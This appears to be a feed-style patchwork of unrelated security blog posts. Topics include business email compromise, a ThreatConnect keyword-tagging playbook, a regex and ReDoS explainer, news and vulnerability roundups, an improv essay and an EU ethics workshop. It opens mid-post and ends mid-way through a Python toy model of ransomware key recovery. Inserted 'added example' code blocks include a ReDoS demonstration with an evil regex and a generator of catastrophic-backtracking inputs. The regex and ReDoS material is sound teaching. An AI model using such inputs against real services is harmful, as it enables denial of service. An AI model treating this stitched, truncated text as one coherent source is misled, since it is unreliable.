Security experts don’t believe BEC attacks will diminish anytime in the near future. In addition to user awareness, enterprises should leverage advanced security solutions to prevent BEC intrusions. Technology from Trend Micro, which utilizes advanced strategies like artificial intelligence to detect email impersonators and machine learning to strengthen overall security, can be beneficial assets.

To find out more about how to guard against BEC within your enterprise, connect with the experts at Trend Micro today.


Playbook Fridays: Document Parsing and Keyword Scanning/Tagging

Automatically tag the documents with keywords and focused areas of interest without human intervention

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

This Playbook is actually a set of three playbooks: one that saves the keywords, one that verifies the saved data is what the analyst expected, and one that performs the actual work.

Many customers have reached out and voiced frustration because analysts were spending a lot of time looking over various reports for specific keywords and then manually applying tags based upon those keywords. This act was getting very time consuming; especially for one customer, who had 10 separate focus areas with more than 200 different keywords.

With this Playbook set, analysts can automatically tag the documents with keywords and focused areas of interest without human intervention, saving the analyst about 4-5 hours/week.

This Playbook set is triggered by the creation of a document in a source (gated on a specific tag, "parseme", a requirement that can be removed once the expected functionality has been verified). First, you set the list of keywords in the datastore contained within ElasticSearch: in JSON, you define a set of keywords, group them, and save them as variables. The main Playbook converts the document into a set of strings that is then passed to the regex capture groups for comparison. For each group with a matching keyword, the Playbook creates a tag for the group, e.g. China or Russia. Additionally, the Playbook tags the document with the actual keywords that matched, e.g. APT12 or APT28.


1) Import "Populate DataStore with Keywords.pbx"
In this Playbook you set a JSON array with your keywords. There are a few examples already preconfigured out of the box to get you started. This playbook only needs to be run once to populate the datastore (and again whenever the list needs to be updated).

Populate DataStore with Keywords


2) Import "Document Keyword Check.pbx"
This playbook needs to be set to a specific owner to monitor and, as a safety measure, is currently configured to fire only on documents carrying the tag "parseme". After verifying functionality, this tag requirement can be omitted so that it runs each time a document is created.

Document Keyword Check
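The tagging flow the two playbooks describe (a grouped keyword store, one regex with a capture group per keyword group, a group tag plus a tag per matched keyword, and a "parseme" gating tag) as an added JavaScript example. This is illustrative code written for this page, not ThreatConnect's Playbook implementation; the keyword groups, the sample document and the tag names are constructed.

```javascript
// Added example: a plain Node.js sketch of the keyword-tagging flow described
// above. Not ThreatConnect Playbook code; groups, document and tags are
// constructed for illustration.

// Constructed keyword store in the grouped JSON shape the text describes.
// In the real flow this comes from the datastore; here it is inline.
const KEYWORD_GROUPS = {
  China: ["APT12", "APT1", "Comment Crew"],
  Russia: ["APT28", "Fancy Bear", "APT29"],
};

// The gating tag: only documents carrying it are processed.
const TRIGGER_TAG = "parseme";

// Escape regex metacharacters so every keyword is matched literally
// (a keyword such as "C&C (v2.0)" must not be parsed as a pattern).
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// One regex per group: a capture group around the alternation of its
// keywords, bounded by \b so "APT1" does not fire inside "APT12", and
// case-insensitive so "apt12" in a report still counts.
function buildGroupRegex(keywords) {
  const alternation = keywords.map(escapeRegex).join("|");
  return new RegExp(`\\b(${alternation})\\b`, "gi");
}

// Scan the document text against every group. Returns the group tags
// (e.g. "China") and the keyword tags (e.g. "APT12") that matched, plus a
// per-group breakdown that the verification playbook would inspect.
function scanText(text, groups = KEYWORD_GROUPS) {
  const tags = new Set();
  const hits = {};
  for (const [group, keywords] of Object.entries(groups)) {
    const re = buildGroupRegex(keywords);
    const found = new Set();
    for (const m of text.matchAll(re)) {
      // Normalise to the canonical spelling stored in the group.
      const canonical = keywords.find((k) => k.toLowerCase() === m[1].toLowerCase());
      found.add(canonical);
    }
    if (found.size > 0) {
      tags.add(group);
      found.forEach((k) => tags.add(k));
      hits[group] = [...found].sort();
    }
  }
  return { tags: [...tags].sort(), hits };
}

// Mirror the trigger behaviour: the document is left untouched unless it is
// tagged "parseme"; when it is, the trigger tag is consumed and the derived
// group and keyword tags are added.
function processDocument(doc, groups = KEYWORD_GROUPS) {
  if (!doc.tags.includes(TRIGGER_TAG)) {
    return { processed: false, tags: [...doc.tags] };
  }
  const { tags } = scanText(doc.body, groups);
  const kept = doc.tags.filter((t) => t !== TRIGGER_TAG);
  return { processed: true, tags: [...new Set([...kept, ...tags])].sort() };
}

// Constructed sample document (not a real report).
const SAMPLE_DOC = {
  name: "weekly-summary.txt",
  tags: ["parseme"],
  body:
    "Infrastructure linked to APT28 (Fancy Bear) overlapped with hosts seen " +
    "in apt12 campaigns. No overlap with APT1 was found.",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(processDocument(SAMPLE_DOC), null, 2));
}
```

The `\b` boundaries are what keep a short keyword such as APT1 from tagging every document that mentions APT12; escaping the keywords keeps an analyst-supplied entry from silently becoming a pattern of its own.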

The post Playbook Fridays: Document Parsing and Keyword Scanning/Tagging appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Explained: regular expression (regex)

Regular expression, or “regex” for short, is a mathematical term for the theory used to describe regular languages. But in computing, regexes are used to search for patterns in files and databases, and their functionality is incorporated into many modern programming languages. Regex search patterns make wildcards look like clumsy clowns because they offer a whole slew of additional options.

Regex overview

The simplest and most common method of searching is to look for a specific string or character in a text file, for example, by using F3 on a website. This is basically what you use when you apply the “Search” or “Search and Replace” functions in Notepad.

Like we said, regex can do a lot more. But to achieve this, a few special characters have to be defined. It is good to know these so-called meta characters, because syntax errors are the most common cause of failed searches.

The most used special characters are:

Square brackets []

Square brackets are used to specify a character set. Exactly one character from the set is matched at that position, unless a quantifier following the set says otherwise.

Example: Malwareb[yi]tes will be a match for Malwarebytes and Malwarebites, but not for Malwarebyites.

The minus sign -

The minus sign or hyphen is used to specify a range of characters.

Example: [0-9] will be a match for any single digit between 0 and 9.

Curly brackets {}

Curly brackets are used to quantify the number of characters.

Example: [0-9]{3} matches any sequence of exactly three digits, i.e. 000 through 999.

Parentheses ()

Parentheses are used to group characters. Matches contain the characters in their exact order.

Example: (are) gives a match for malware, but not for aerial, because the order of the characters in aerial differs from the specification.

Vertical bar |

The vertical bar (pipe), as in many languages, stands for the logical “or” operator.

Example: Most|more will be a match for both of the specified words.

Period .

The dot or period acts as a wildcard. It matches any single character, except line break characters.

Example: Malwareb.tes will be a match for Malwarebytes, Malwarebites, Malwarebotes, and many others, but still not for Malwarebyites.

Backslash \

The backslash is used to escape special characters and to give special meaning to some characters that follow it.

Examples: \d matches a single digit (0-9).

\w matches a single word character: a letter, a digit, or an underscore.

Asterisk *

The asterisk is a repeater. It matches when the character preceding it matches 0 or more times.

Example: cho*se will match for chose and choose, but also for chse (zero match).

Asterisk and period .*

The asterisk is used in combination with the period to match for any character 0 or more times.

Example: Malware.* will match for Malware, Malwarebytes, and any misspelled version that starts with Malware.

Plus sign +

The plus sign matches when the character preceding + matches 1 or more times.

Example: cho+se will match for chose and choose, but not for chse.

There are quite a few more meta characters, but it is outside the scope of this post to explain them all in detail. For those interested, there are many basic and advanced regex tutorials available. One of them will certainly fit your specific wishes.
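The metacharacter rules above, exercised in JavaScript as an added example. This is not code from the original post: the patterns and inputs are the post's own examples plus a few constructed ones, and the anchoring and capture-group helpers at the end illustrate two points the list leaves implicit (an unanchored pattern matches anywhere in the input, and parentheses capture as well as group).

```javascript
// Added example: the metacharacter rules from the post, encoded as
// match/reject claims and checked by running them. Not code from the
// original post; patterns are the post's examples plus constructed ones.

// Each entry: a pattern, inputs it should match, inputs it should reject.
// Anchors (^ and $) are added where the post talks about "a single digit"
// or "exactly three digits", because without them the pattern matches
// anywhere inside the input.
const CLAIMS = [
  { name: "character set", re: /Malwareb[yi]tes/, yes: ["Malwarebytes", "Malwarebites"], no: ["Malwarebyites"] },
  { name: "range", re: /^[0-9]$/, yes: ["0", "7", "9"], no: ["a", "10"] },
  { name: "quantifier", re: /^[0-9]{3}$/, yes: ["000", "999"], no: ["99", "1000"] },
  { name: "group", re: /(are)/, yes: ["malware"], no: ["aerial"] },
  { name: "alternation", re: /Most|more/, yes: ["Most", "more"], no: ["most"] },
  { name: "wildcard", re: /Malwareb.tes/, yes: ["Malwarebytes", "Malwarebites", "Malwarebotes"], no: ["Malwarebyites", "Malwareb\ntes"] },
  { name: "digit class", re: /^\d$/, yes: ["5"], no: ["x", "55"] },
  { name: "word class", re: /^\w$/, yes: ["a", "Z", "0", "_"], no: ["-", " "] },
  { name: "star", re: /cho*se/, yes: ["chose", "choose", "chse"], no: ["chase"] },
  { name: "dot-star", re: /Malware.*/, yes: ["Malware", "Malwarebytes", "Malwarebyts"], no: ["Malwre"] },
  { name: "plus", re: /cho+se/, yes: ["chose", "choose"], no: ["chse"] },
];

// Run every claim; return the ones that do not hold (empty array = all hold).
function verifyClaims(claims = CLAIMS) {
  const failures = [];
  for (const c of claims) {
    for (const s of c.yes) {
      if (!c.re.test(s)) failures.push(`${c.name}: expected ${c.re} to match ${JSON.stringify(s)}`);
    }
    for (const s of c.no) {
      if (c.re.test(s)) failures.push(`${c.name}: expected ${c.re} to reject ${JSON.stringify(s)}`);
    }
  }
  return failures;
}

// Caveat: without anchors a pattern matches anywhere, so [0-9]{3} accepts
// "1234" (it finds "123" inside it); ^...$ pins it to the whole string.
function anchoringMatters(input) {
  return { anywhere: /[0-9]{3}/.test(input), whole: /^[0-9]{3}$/.test(input) };
}

// Parentheses also capture what they matched, which is what makes a group
// useful for extracting a field rather than only testing for it.
// Constructed pattern: "Malwarebytes <major>.<minor>".
function extractVersion(s) {
  const m = /^Malwarebytes (\d+)\.(\d+)$/.exec(s);
  return m ? { major: Number(m[1]), minor: Number(m[2]) } : null;
}

if (typeof require !== "undefined" && require.main === module) {
  const failures = verifyClaims();
  console.log(failures.length === 0 ? "all claims hold" : failures.join("\n"));
  console.log(anchoringMatters("1234"));
  console.log(extractVersion("Malwarebytes 3.5"));
}
```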

Responsible use

Sophisticated regexes look intimidating and confusing at first sight, but once you have constructed a few yourself, you will start recognizing what others have tried to accomplish—especially if you take them apart one piece at a time. But we do advise caution when using your own regexes on public-facing servers or apps. An inexperienced publisher could be digging his own grave by doing so.

For most common tasks, there are many examples to be found on code repositories like GitHub. But you will have to choose carefully and ask yourself:

  • Security-wise, is it safe to use in production?
  • Is it well maintained? Does it get updated regularly, or will that become your future task?

“The more contributors, the better” is the rule of thumb here. More contributors mean not only more eyes that check for vulnerabilities, but also more people writing new code and improving existing code.


As in many other programming languages, regex can be used in JavaScript as well. This capability is nice, but also poses a problem that has been known for several years. The first paper mentioning the possibilities of a regular expression denial of service (ReDoS) stems from 2012.

Basically, an attacker can prepare a specially-crafted and/or lengthy piece of text that he feeds into an input field of a JavaScript-based web server or app. Since JavaScript does not run multi-threaded, the targeted server or app is busy running its regex functions on the text. While it is doing that, it is unable to perform any other tasks, so the server or app will appear to be frozen. Other languages will take a long time to deal with such texts as well, but if they are multi-threaded, other requests can be dealt with at the same time and won’t have to wait until the regex functions are done processing the text.

Since it is not hard to figure out, or in some cases, it’s well-known what regexes will be performed, it is relatively easy to craft a text that will keep an unprotected server occupied for up to a few minutes.

For example, many servers use Node.js, a JavaScript runtime that has quite a few documented ReDoS vulnerabilities.

In other cases, attackers can search for so-called “evil regexes.” What makes a regex stand out as evil?

  • The regular expression applies repetition (“+”, “*”) to a complex subexpression.
  • For the repeated subexpression, there exists a match that is also a suffix of another valid match.

Prevention of ReDoS attacks

To prevent becoming a victim of a ReDoS attack, it is not enough to rely on the built-in security of the regex. Here are some tips:

  • Use atomic grouping in your regex. An atomic group is a group that, when the regex engine exits from it, automatically throws away all backtracking positions remembered by any tokens inside the group.
  • Keep tabs on your regexes. When a regex takes much longer than it should, kill it at once. You can inform the user that it was stopped for this reason and as a security measure.
  • Validate your input, and don’t allow users to use their own regexes. If there is no other way, then pre-format the regexes and only allow certain minimal deviations.
  • Only write your own regexes for production servers and apps if there are no other known reliable sources available.
  • Use one of the verification packages that are available for regexes to have your regex checked for vulnerabilities.
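The two "evil regex" properties listed earlier and the prevention tips above, as an added JavaScript example (this is illustrative code written for this page, not from the original post): a pattern with the evil shape, a rewrite that matches the same inputs without nested repetition, a heuristic lint that flags the shape, and an input-length guard. JavaScript's regex engine has no atomic groups, so the atomic-grouping tip cannot be applied literally here; removing the ambiguity from the pattern is the equivalent fix. The `hasNestedQuantifier` helper and the hostile inputs are constructed for this example.

```javascript
// Added example: an evil-shaped regex, its safe rewrite, a heuristic lint,
// and an input-length guard. Illustrative code for this page, not from the
// original post.

// Repetition applied to a subexpression that itself repeats (the two bullets
// above). On a non-matching input such as "aaaa...a!" the engine tries every
// way of splitting the run of "a" between the inner and outer quantifier
// before giving up, and the number of ways doubles with each extra "a".
const EVIL = /^(a+)+$/;

// Same language (one or more "a"), only one way to match, linear time.
const SAFE = /^a+$/;

// Heuristic static check for the evil shape: a group that contains a
// quantifier and is itself followed by a quantifier. It is a lint, not a
// proof: it misses other ReDoS shapes and may flag harmless patterns.
function hasNestedQuantifier(source) {
  return /\((?:[^()\\]|\\.)*[+*](?:[^()\\]|\\.)*\)[+*{]/.test(source);
}

// Input-length guard: the cheapest defence when the pattern cannot be
// changed. Returns null (refused) instead of running the regex on oversized
// input, so the caller can report it rather than hang.
function guardedTest(re, input, maxLength = 256) {
  if (input.length > maxLength) return null;
  return re.test(input);
}

// Wall-clock measurement of one match attempt, in milliseconds.
function timeMatch(re, input) {
  const start = Date.now();
  const matched = re.test(input);
  return { matched, ms: Date.now() - start };
}

// Constructed non-matching input: a run of "a" ended by a character the
// pattern cannot accept, which forces the full backtracking search.
function hostileInput(n) {
  return "a".repeat(n) + "!";
}

if (typeof require !== "undefined" && require.main === module) {
  for (const n of [10, 15, 20]) {
    const evil = timeMatch(EVIL, hostileInput(n));
    const safe = timeMatch(SAFE, hostileInput(n));
    console.log(`n=${n}  evil: ${evil.ms} ms  safe: ${safe.ms} ms`);
  }
  console.log("lint flags", EVIL.source, "->", hasNestedQuantifier(EVIL.source));
  console.log("lint flags", SAFE.source, "->", hasNestedQuantifier(SAFE.source));
}
```

Running the block prints the evil pattern's time roughly doubling with each extra character while the rewrite stays flat; the lint and the length guard are the parts worth wiring into a code review hook and a request handler respectively.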

Popular does not equal safe

Even though Node.js is an immensely popular JavaScript runtime, it is not enough to rely on the security it provides. And even though regexes can be useful tools, using them should come with some precautions. Reportedly, there has been an uptick in web apps and servers that have been under ReDoS attacks lately.


Related reading:

  • Understanding ReDoS Attack
  • JavaScript Web Apps and Servers Vulnerable to ReDoS Attacks
  • How a RegEx can bring your Node.js service down

Stay safe!

The post Explained: regular expression (regex) appeared first on Malwarebytes Labs.

This Week in Security News: Air Canada and Cryptojacking

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Air Canada reported a data breach that exposed passport details for more than 20,000 customers on their mobile app. Also, Trend Micro’s Midyear Security Roundup reported an increase in cryptojacking and a decrease in ransomware attacks.

Read on:

Cybercriminals Changing Tactics as Seen in First Half Report

Trend Micro has seen a shift from large ransomware spam campaigns to more targeted attacks using ransomware as the tool to disrupt critical business operations.

The Urpage Connection to Bahamut, Confucius and Patchwork

In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes. 

Microsoft Windows zero-day vulnerability disclosed through Twitter

Microsoft has quickly reacted to the disclosure of a previously unknown zero-day vulnerability in the Windows operating system.

Addressing Challenges in Hybrid Cloud Security

Hybrid environments can come with risks and challenges, especially for organizations adopting DevOps.

Air Canada Reveals Mobile Data Breach, Passport Numbers Potentially Exposed

Air Canada reported a data breach involving the airline’s mobile app which may have led to the exposure of passport details for 20,000 customers.

Banks in Peru Hit by Phishing Attack Using Bitcoin Advertisements as Lure

The campaign used phishing emails with clickable links to lure victims; similar phishing attempts were also seen in other countries, including Thailand, Malaysia, Indonesia, the USA, and more.

Tech Industry Pursues a Federal Privacy Law, on Its Own Terms

Tech giants are lobbying government officials to outline a federal privacy law that would overrule the recent California law.

Unseen Threats, Imminent Losses

A review of the first half of 2018 shows a threat landscape that not only has familiar features, but also has morphing and uncharted facets: Ever-present threats grew while emerging ones used stealth.

Exclusive: Iran-Based Political Influence Operation – Bigger, Persistent, Global

An Iranian influence operation targeting internet users worldwide is bigger than previously identified, encompassing a network of anonymous websites and social media accounts in 11 different languages.

Supply Chain Attack Operation Red Signature Targets South Korean Organizations

Together with our colleagues at IssueMakersLab, Trend Micro uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea.

T-Mobile was Hit by a Data Breach Affecting Around 2 Million Customers

Hackers gained access to personal information from roughly 2 million T-Mobile customers, including the name, billing zip code, phone number, email address, account number and account type of users.

Did the results from Trend Micro’s 2018 security report roundup surprise you? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Apple insists developers ramp up their privacy commitments

Apple recently told the U.S. Congress that it sees customer privacy as a “human right,” though the explanation didn’t at that time extend to how third-party developers treat data they get from iOS apps. Now it does.

Privacy for the rest of us

Starting October 3, Apple will insist that all third-party apps (including new apps and app updates) submitted to the App Store include a link to the app developer’s own privacy policy.

This is a big change, as until now only subscription-based apps needed to supply this information — and it also extends to the privacy policy itself, which Apple insists must be clear and explicit in explaining:

To read this article in full, please click here

Applying Improv Techniques to Threat Intelligence

Threat intelligence is no joke. And yet, a few lessons from improv comedy can help us become better practitioners of it. While improv and threat intelligence make for an unlikely alliance, I invite you to explore how the former can positively impact the latter — and how Recorded Future can help.

First, improv. As its name suggests, improv comedy is all about improvising. It’s about doing well with the unexpected and doing the seemingly impossible. As a threat intelligence practitioner, you need to be well versed in doing both. There are two principles of improv comedy that are as important for actors on a stage as they are for analysts in the trenches: accepting a new reality, and the principle of “Yes, and …”

Accepting a New Reality

Improv is nothing if not a continuous exercise in accepting a new reality. That reality comes from audience suggestions that serve as the basis of subsequent scenes. Improvisers can’t fight that new reality — they have to embrace it.

The same is true for threat intelligence practitioners. If something bad happens — a peer company is hit by a ransomware attack, or an exploit kit becomes available for a vulnerability that might impact your organization — you can’t wish that new reality away. You have to recognize it, accept it, and defend against it. Recorded Future can help you not only validate this new reality, but also better understand it.

Forming a More Complete Picture

The principle of “Yes, and …” is what makes improv what it is. The basic premise is that in improv comedy, the actors need to say, “Yes, and …” to any “yes” or “no” question they may face. Take, for example, the question, “Do you want to go fishing?” If an actor says, “No,” then the scene comes to an abrupt end. That’s no fun for the audience or the actors. If, however, an actor says, “Yes, and let’s fly a kite off the back of the boat to pass the time,” now we’re getting somewhere. This affirmation not only allows the scene to continue, but also introduces additional elements that make for a more complete picture.

And that’s exactly what Recorded Future does. Armed with the content provided by Recorded Future — be it a list of IOCs (indicators of compromise), threat actor profiles, exploit chatter on an underground forum, or something else — Recorded Future puts you, as an analyst, in the position to not only answer “yes” to a manager’s question about an incident but to also say, “… and here is all of the information available about it.” Boom. That type of response can make you a star — be it on stage or in a SOC (security operations center).

Practices to Consider

You may well be applying the principles of accepting a new reality and “Yes, and …” without even knowing it. If you are, keep it up! If not, I would encourage you to try out these improv anecdotes. They help instill and reinforce a confidence in handling any type of situation that may come your way, which helps you protect your organization as best as you can. Give it a shot — you may be surprised at how well these improv principles can improve your practice of threat intelligence.

David Peduto

David Peduto is the product support manager at Recorded Future. He’s a proud (although somewhat unexpected) graduate of the Improv Asylum’s training center in Boston, and co-founder of the Fletcher Improv Group at The Fletcher School of Law and Diplomacy, Tufts University.

The post Applying Improv Techniques to Threat Intelligence appeared first on Recorded Future.


Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy-focused organizations. The Chatham House rule (including a no-recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in the text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

Security Flaws & Fixes – W/E – 083118

Adobe Fixes Privilege Escalation Bug in Creative Cloud (08/29/2018)
Adobe released an update for Creative Cloud. This update alleviates an issue that could result in a privilege escalation condition.

Advisory Describes Mitigation Methods for ABB eSOMS Vulnerability (08/28/2018)
ABB eSOMS, an electronic shift operations management system, is affected by an improper authentication issue, which has been described in an advisory. Mitigation techniques are depicted in the alert.

Crashing Apps Serve Up Private Data Via SDKs (08/28/2018)
According to analysis from Appthority, several software developer kits (SDKs) from AppSee and Testfairy have the capability to capture sensitive data whenever a mobile app crashes. These particular SDKs enable developers to understand why apps crash, but when an app indeed crashes, the SDKs take screenshots of the devices. "This opens up doors for new exploits in enterprise mobile environments, as third-parties are increasingly recording mobile screens for debugging purpose and sending them back to external servers," Appthority's Su Mon Kywe warned in a blog post.

Cisco Advises on Multiple Product Vulnerabilities (08/29/2018)
Cisco has released a batch of advisories discussing vulnerabilities across its product lines. Among the most critical issues are a Linux kernel IP fragment assembly bug affecting multiple products, Linux and FreeBSD kernel bugs affecting multiple products, and a path traversal vulnerability in the Data Center Network Manager.

Facebook Squashes Info Disclosure Bug (08/29/2018)
A Facebook server bug that could leak information and enable command execution has been patched after the company received notification from the researchers at SCRT Information Security. The server's Sentry service, an open-source error tracking app written in Python and Django, regularly showed stack traces, which identify the functions that were executing at the time of an error, and appeared to be unstable. Further investigation showed the stack traces printing the entire application.

Firmware Update Available for Qualcomm Life's Capsule (08/28/2018)
Qualcomm Life's Capsule Datacaptor Terminal Server contains a code weakness bug that could enable an attacker to execute unauthorized code to obtain administrator-level privileges on the device. Users may download updated firmware for this issue, as discussed in an ICS-CERT advisory.

Fiserv Bug Exposed Accounts at Numerous Banks (08/28/2018)
Security researcher Brian Krebs uncovered information regarding a vulnerability within Fiserv's Web platform that resulted in the compromise of customer personal and financial data across hundreds of banking Web sites. Fiserv is a technology service provider offering account and transaction processing systems to financial institutions. KrebsOnSecurity was notified by third-party researcher Kristian Erik Hermansen of a flaw in the Fiserv platform that enabled him to access account data for customers through sequential event numbers. Hermansen attempted to contact Fiserv with no luck but Krebs was able to notify the company, which has since resolved the issue. Krebs has been told by experts that 1,700 banks use the Fiserv platform.

Multiple Advisories Posted for Schneider Electric Vulnerabilities (08/28/2018)
Multiple vulnerabilities affect Schneider Electric products. The ICS-CERT has issued two advisories for Modicon M221 to address an improper check for unusual or exceptional conditions and bugs that could result in attackers replaying authentication sequences, overwriting passwords, or decoding passwords. A third advisory pertains to a cross-site scripting issue in PowerLogic PM5560.

Patched Apache Struts Bug Being Exploited to Drop Cryptocurrency Miner (08/28/2018)
Within a day of the Apache Foundation's August 22 release of a fix for a critical bug in the Struts Framework, a proof-of-concept (PoC) exploit was issued online. On August 24, a Python script was released to make use of the exploit. Once the PoC was released, Volexity observed active scanning and attempted exploitation of the vulnerability across its sensor network. One threat actor was seen exploiting the Struts vulnerability in an effort to install the CNRig cryptocurrency miner.

TechCrunch: Sprint's Security Blunder Leaves Customer Data Exposed (08/27/2018)
Sprint is coming under fire for a report by TechCrunch which revealed a major security blunder on the carrier's part. According to the exposé, Sprint was employing at least two sets of easily-guessed login credentials to secure a portal which provided access to customer data for Boost Mobile and Virgin Mobile customers. The issue was apparently brought to light by a third-party security researcher, who was able to obtain unauthorized access to the portal in question. Making matters worse was the fact the portal could also be accessed by a hacker with nothing more than a customer account phone number and a four-digit PIN. The phone number could be easily obtained, while the system provided an unlimited number of guesses for entering the PIN. This means that any hacker could brute-force their way into the system with a maximum of 9,999 attempts. One mitigating factor in this incident is the fact that the customer portal was never meant for public use, and is largely unknown outside of Sprint's own staff. However, the carrier has confirmed the incident to TechCrunch and promises that it is already in the process of "research[ing] the issue" to prevent any future recurrence.

Windows 10 Susceptible to Unpatched Local Privilege Escalation Bug (08/28/2018)
A security researcher tweeted details about an unpatched bug in the Windows 10 operating system. The researcher also posted a link to the proof-of-concept on GitHub. Will Dormann, an analyst at CERT/CC, confirmed the local privilege escalation vulnerability in a fully patched 64-bit Windows 10 system. The bug is in the Advanced Local Procedure Call interface. US-CERT has published an advisory.

Malware Watch – W/E – 083118

Abused IQY Files Exploited by Spam Campaign to Serve Up Malware (08/28/2018)
Trend Micro spotted increased abuse of the Internet query file IQY and expects that the simple structure of IQY files is being exploited to evade structure-based detection methods. The Cutwail botnet has been distributing spam mails abusing IQY files and targeting users in Japan through infections with the Bebloh or Ursnif malware.

AdvisorsBot Downloader Has Fingerprint Capabilities (08/27/2018)
Campaigns using the AdvisorsBot downloader as a first-stage payload are loading a fingerprinting module to further infect targets of interest with other types of malware. According to research conducted by Proofpoint, AdvisorsBot is in use by a threat entity called TA555 and is under active development. The malware was first seen in May and has been continually evolving.

Asacub Banking Trojan Is Back to Take Aim at Russian Banking Customers (08/28/2018)
Kaspersky Lab researchers analyzed a new variant of the Asacub mobile banking Trojan, which is designed to steal money from Android users connected to the mobile banking service of one of Russia's largest banks. Asacub is propagated via phishing SMS messages containing a link and an offer to view a photo or MMS. Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService. After receiving the rights, it sets itself as the default SMS app and disappears from the device screen. If the user ignores or rejects the request, the window reopens every few seconds.

"BusyGasper" Malware Logs Keystrokes, Spies on Victims (08/29/2018)
Kaspersky Lab has identified "BusyGasper," an Android malware sample that listens in on devices, can bypass the Doze battery saver, log keystrokes, and exfiltrate data from messaging apps. BusyGasper has a multicomponent structure and can download a payload or updates from its command and control server, which is an FTP server belonging to the free Russian web hosting service Ucoz.

CEIDPageLock Browser Hijacker Distributed by RIG Exploit Kit (08/30/2018)
The RIG Exploit Kit is pushing out a rootkit called CEIDPageLock, a sophisticated browser hijacker. Although CEIDPageLock was known prior to this research conducted by Check Point Software, the malware has new functionality, including a capability that monitors user browsing and dynamically replaces the content of several popular Chinese Web sites with fake home pages, whenever the user tries to visit them. Based on the information obtained by Check Point, CEIDPageLock particularly targets Chinese victims.

Kaspersky Lab Reports on Botnet Activity for First Half of the Year (08/29/2018)
Multifunctional malware, which is not designed for a specific purpose but can handle a multitude of tasks, became widespread in the first half of 2018. This information comes from Kaspersky Lab's analysis of over 150 malware families and their modifications circulating through 60,000 botnets. The vendor identified njRAT, an easily modified backdoor, as the most widespread remote access Trojan (RAT) downloaded by bots during the period between January and June 2018.

Loki Bot Malware Found in New Spam Campaign (08/29/2018)
The Loki Bot malware has been spotted in a malicious campaign targeting corporate mailboxes. Loki Bot steals passwords and sends them to its malware owners. Kaspersky Lab's team uncovered this campaign.

Mirai Variants Emerge with the Ability to Infect Multiple Platforms (08/28/2018)
New Linux Mirai variants have been seen by the researchers at Symantec after a remote server hosting multiple malware samples was identified. The variants are robust and compatible with multiple architectures and devices, meaning that routers, IP cameras, and Android devices can be vulnerable. In a blog post, Dinesh Venkatesan said, "As with many Mirai infections, it starts by firing a shell script on a vulnerable device. That shell script sequentially tries downloading and executing individual executables one by one until a binary compliant with the current architecture is found."

RansomWarrior Can Be Decrypted, Thanks to Check Point Tool (08/30/2018)
Check Point Software's team of security researchers has released a decryption tool for the RansomWarrior ransomware. The ransomware uses a stream cipher with a key randomly chosen from a list of 1,000 hard-coded keys in its binary. Check Point was able to extract those keys, and because the chosen key's index is saved locally on the victim's computer, the tool can supply the correct key back to the ransomware itself to unlock the files.
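The following added example (not Check Point's decryptor and not RansomWarrior's code) models the design flaw described above. The real cipher and key table are not on the page, so here the "hard-coded" table is 1,000 keys derived from a constant and the stream cipher is a SHA-256 counter-mode keystream XORed with the data; both are assumptions for the demo. What carries over is the error itself: the ciphertext depends only on which of 1,000 keys was picked, and that index is written locally, so the victim's machine holds everything needed to decrypt. The example also goes one step beyond the page and shows that, even without the saved index, a predictable file header makes 1,000 candidates a trivial search.

```python
"""Added example: toy model of a ransomware that picks one of 1,000 embedded
keys and records the index locally.  Cipher and key table are constructed
stand-ins, not RansomWarrior's real ones.
"""
import hashlib
import random

# Constructed stand-in for the ransomware's embedded key table.
KEY_TABLE = [hashlib.sha256(b"demo-table-%d" % i).digest() for i in range(1000)]


def keystream(key, length):
    """Expand a key into `length` bytes of keystream (SHA-256 in counter mode)."""
    out = bytearray()
    counter = 0
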